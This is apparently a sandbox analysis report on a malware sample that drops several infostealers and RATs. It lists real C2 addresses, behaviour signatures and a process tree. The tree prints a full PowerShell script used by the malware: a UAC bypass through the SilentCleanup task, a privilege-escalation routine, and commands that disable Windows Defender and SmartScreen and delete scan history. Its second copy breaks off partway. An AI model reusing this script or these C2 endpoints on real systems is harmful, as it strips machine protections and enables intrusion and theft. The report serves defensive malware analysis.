Analysis

  • max time kernel
    142s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-12-2024 10:22

General

  • Target

    file.exe

  • Size

    3.1MB

  • MD5

    9aba31b7a6b0d1afa4b290557ad5b6fb

  • SHA1

    09d2f60eef3abb4c20394fd8369b32846456c533

  • SHA256

    9b1fad1eb049d54f44103ba67be774b96d2cfd82eeb5ec72aadd20ec29d846f8

  • SHA512

    a6df82bd55a8a45f5057fdc4ee9249fd11120854037157f5202ea282205798b309eb513ea62cec2de3e67ba2b7e64cbb3a852e3b57ddf361288c0843b039634f

  • SSDEEP

    98304:/JKXSj40TA0DywZAoxOYTdrylkhN/qeo:/JKX2/du6hQ

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

205.209.109.10:4449

205.209.109.10:7723

Mutex

clgbfqzkkypxjps

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://covery-mover.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • VenomRAT 6 IoCs

    Detects VenomRAT.

  • Venomrat family
  • Async RAT payload 4 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Start PowerShell.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:852
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2852
      • C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe
        "C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3992
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 224
          4⤵
          • Program crash
          PID:6108
      • C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe
        "C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"
        3⤵
        • UAC bypass
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:3172
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:860
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 968
            5⤵
            • Program crash
            PID:3672
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientAny.exe"' & exit
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2968
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientAny.exe"'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1732
            • C:\Users\Admin\AppData\Local\Temp\ClientAny.exe
              "C:\Users\Admin\AppData\Local\Temp\ClientAny.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:2940
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
          4⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2652
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\system32\sc.exe" qc windefend
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:4356
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4600
          • C:\Windows\SysWOW64\whoami.exe
            "C:\Windows\system32\whoami.exe" /groups
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1984
          • C:\Windows\SysWOW64\net1.exe
            "C:\Windows\system32\net1.exe" start TrustedInstaller
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4528
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
